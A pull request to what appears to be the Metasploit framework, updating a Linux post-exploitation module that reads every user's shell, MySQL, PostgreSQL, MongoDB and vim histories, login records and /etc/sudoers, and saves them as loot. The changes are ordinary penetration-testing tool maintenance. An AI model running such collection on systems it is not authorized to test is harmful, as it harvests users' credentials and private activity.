### PR TITLE
Update Linux Gather User History module

### DIFF
--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -47,7 +47,8 @@ class Metasploit3 < Msf::Post
     shells.each do |shell|
       get_shell_history(users, user, shell)
     end
-    get_sql_history(users, user)
+    get_mysql_history(users, user)
+    get_psql_history(users, user)
     get_vim_history(users, user)
     last = execute("/usr/bin/last && /usr/bin/lastlog")
     sudoers = cat_file("/etc/sudoers")
@@ -109,25 +110,45 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def get_sql_history(users, user)
+  def get_mysql_history(users, user)
     if user == "root" and users != nil
       users = users.chomp.split()
       users.each do |u|
         if u == "root"
-          vprint_status("Extracting SQL history for #{u}")
+          vprint_status("Extracting MySQL history for #{u}")
           sql_hist = cat_file("/root/.mysql_history")
         else
-          vprint_status("Extracting SQL history for #{u}")
+          vprint_status("Extracting MySQL history for #{u}")
           sql_hist = cat_file("/home/#{u}/.mysql_history")
         end
-
-        save("History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
+        save("MySQL History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
       end
     else
-      vprint_status("Extracting SQL history for #{user}")
+      vprint_status("Extracting MySQL history for #{user}")
       sql_hist = cat_file("/home/#{user}/.mysql_history")
       vprint_status(sql_hist) if sql_hist
-      save("SQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
+      save("MySQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
+    end
+  end
+
+  def get_psql_history(users, user)
+    if user == "root" and users != nil
+      users = users.chomp.split()
+      users.each do |u|
+        if u == "root"
+          vprint_status("Extracting PostgreSQL history for #{u}")
+          sql_hist = cat_file("/root/.psql_history")
+        else
+          vprint_status("Extracting PostgreSQL history for #{u}")
+          sql_hist = cat_file("/home/#{u}/.psql_history")
+        end
+        save("PostgreSQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
+      end
+    else
+      vprint_status("Extracting PostgreSQL history for #{user}")
+      sql_hist = cat_file("/home/#{user}/.psql_history")
+      vprint_status(sql_hist) if sql_hist
+      save("PostgreSQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
     end
   end
 

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post
         'Name'         => 'Linux Gather User History',
         'Description'  => %q{
           This module gathers user specific information.
-          User list, bash history, mysql history, vim history,
-          lastlog and sudoers.
+          User list, shell history, mysql history,
+          postgresql history, vim history, lastlog and sudoers.
         },
         'License'      => MSF_LICENSE,
         'Author'       =>

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -53,8 +53,8 @@ class Metasploit3 < Msf::Post
     last = execute("/usr/bin/last && /usr/bin/lastlog")
     sudoers = cat_file("/etc/sudoers")
 
-    save("Last logs", last) unless last.nil?
-    save("Sudoers", sudoers) unless sudoers.nil? || sudoers =~ /Permission denied/
+    save("Last logs", last) unless last.blank?
+    save("Sudoers", sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
   end
 
   def save(msg, data, ctype="text/plain")
@@ -121,13 +121,13 @@ class Metasploit3 < Msf::Post
           vprint_status("Extracting MySQL history for #{u}")
           sql_hist = cat_file("/home/#{u}/.mysql_history")
         end
-        save("MySQL History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
+        save("MySQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting MySQL history for #{user}")
       sql_hist = cat_file("/home/#{user}/.mysql_history")
       vprint_status(sql_hist) if sql_hist
-      save("MySQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
+      save("MySQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
     end
   end
 
@@ -164,13 +164,13 @@ class Metasploit3 < Msf::Post
           vim_hist = cat_file("/home/#{u}/.viminfo")
         end
 
-        save("VIM History for #{u}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
+        save("VIM History for #{u}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting history for #{user}")
       vim_hist = cat_file("/home/#{user}/.viminfo")
       vprint_status(vim_hist)
-      save("VIM History for #{user}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
+      save("VIM History for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
     end
   end
 end

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -43,7 +43,10 @@ class Metasploit3 < Msf::Post
     user = execute("/usr/bin/whoami")
 
     mount = execute("/bin/mount -l")
-    get_bash_history(users, user)
+    shells = ['ash', 'bash', 'csh', 'ksh', 'sh', 'tcsh', 'zsh']
+    shells.each do |shell|
+      get_shell_history(users, user, shell)
+    end
     get_sql_history(users, user)
     get_vim_history(users, user)
     last = execute("/usr/bin/last && /usr/bin/lastlog")
@@ -84,25 +87,25 @@ class Metasploit3 < Msf::Post
     return output
   end
 
-  def get_bash_history(users, user)
+  def get_shell_history(users, user, shell)
+    return if shell.nil?
     if user == "root" and users != nil
       users = users.chomp.split()
       users.each do |u|
         if u == "root"
-          vprint_status("Extracting history for #{u}")
-          hist = cat_file("/root/.bash_history")
+          vprint_status("Extracting #{shell} history for #{u}")
+          hist = cat_file("/root/.#{shell}_history")
         else
-          vprint_status("Extracting history for #{u}")
-          hist = cat_file("/home/#{u}/.bash_history")
+          vprint_status("Extracting #{shell} history for #{u}")
+          hist = cat_file("/home/#{u}/.#{shell}_history")
         end
-
-        save("History for #{u}", hist) unless hist.nil? || hist =~ /No such file or directory/
+        save("#{shell} History for #{u}", hist) unless hist.blank? || hist =~ /No such file or directory/
       end
     else
-      vprint_status("Extracting history for #{user}")
-      hist = cat_file("/home/#{user}/.bash_history")
+      vprint_status("Extracting #{shell} history for #{user}")
+      hist = cat_file("/home/#{user}/.#{shell}_history")
       vprint_status(hist)
-      save("History for #{user}", hist) unless hist.nil? || hist =~ /No such file or directory/
+      save("#{shell} History for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
     end
   end
 

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post
         'Name'         => 'Linux Gather User History',
         'Description'  => %q{
           This module gathers user specific information.
-          User list, shell history, mysql history,
-          postgresql history, vim history, lastlog and sudoers.
+          User shell history, MySQL history, PostgreSQL history,
+          MongoDB history, vim history, lastlog and sudoers.
         },
         'License'      => MSF_LICENSE,
         'Author'       =>
@@ -49,6 +49,7 @@ class Metasploit3 < Msf::Post
       end
       get_mysql_history(u)
       get_psql_history(u)
+      get_mongodb_history(u)
       get_vim_history(u)
     end
 
@@ -116,6 +117,16 @@ class Metasploit3 < Msf::Post
       sql_hist = cat_file("/home/#{user}/.psql_history")
     end
     save("PostgreSQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
+  end
+
+  def get_mongodb_history(user)
+    vprint_status("Extracting MongoDB history for #{user}")
+    if user == 'root'
+      sql_hist = cat_file('/root/.dbshell')
+    else
+      sql_hist = cat_file("/home/#{user}/.dbshell")
+    end
+    save("MongoDB History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
   end
 
   def get_vim_history(user)

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -89,11 +89,10 @@ class Metasploit3 < Msf::Post
     if user == 'root' && !users.nil?
       users = users.chomp.split
       users.each do |u|
+        vprint_status("Extracting #{shell} history for #{u}")
         if u == 'root'
-          vprint_status("Extracting #{shell} history for #{u}")
           hist = cat_file("/root/.#{shell}_history")
         else
-          vprint_status("Extracting #{shell} history for #{u}")
           hist = cat_file("/home/#{u}/.#{shell}_history")
         end
         save("#{shell} History for #{u}", hist) unless hist.blank? || hist =~ /No such file or directory/
@@ -110,11 +109,10 @@ class Metasploit3 < Msf::Post
     if user == 'root' && !users.nil?
       users = users.chomp.split
       users.each do |u|
+        vprint_status("Extracting MySQL history for #{u}")
         if u == 'root'
-          vprint_status("Extracting MySQL history for #{u}")
           sql_hist = cat_file('/root/.mysql_history')
         else
-          vprint_status("Extracting MySQL history for #{u}")
           sql_hist = cat_file("/home/#{u}/.mysql_history")
         end
         save("MySQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
@@ -131,11 +129,10 @@ class Metasploit3 < Msf::Post
     if user == 'root' && !users.nil?
       users = users.chomp.split
       users.each do |u|
+        vprint_status("Extracting PostgreSQL history for #{u}")
         if u == 'root'
-          vprint_status("Extracting PostgreSQL history for #{u}")
           sql_hist = cat_file('/root/.psql_history')
         else
-          vprint_status("Extracting PostgreSQL history for #{u}")
           sql_hist = cat_file("/home/#{u}/.psql_history")
         end
         save("PostgreSQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
@@ -152,17 +149,16 @@ class Metasploit3 < Msf::Post
     if user == 'root' && !users.nil?
       users = users.chomp.split
       users.each do |u|
+        vprint_status("Extracting VIM history for #{u}")
         if u == 'root'
-          vprint_status("Extracting VIM history for #{u}")
           vim_hist = cat_file('/root/.viminfo')
         else
-          vprint_status("Extracting VIM history for #{u}")
           vim_hist = cat_file("/home/#{u}/.viminfo")
         end
         save("VIM History for #{u}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
       end
     else
-      vprint_status("Extracting history for #{user}")
+      vprint_status("Extracting VIM history for #{user}")
       vim_hist = cat_file("/home/#{user}/.viminfo")
       vprint_status(vim_hist)
       save("VIM History for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/


### PR DESCRIPTION
Minor improvements and tidy up of Linux Gather User History module.
- Collect history for additional shells (ash bash csh ksh sh tcsh zsh)
- Collect PostgreSQL history
- Collect MongoDB history
- Replace hard-coded `/home/#{user}` with user home directory enumeration.
- Use `blank?` instead of `nil?` to avoid writing empty text files to loot directory.
- Remove `/bin/mount -l` as it wasn't used/saved anywhere.
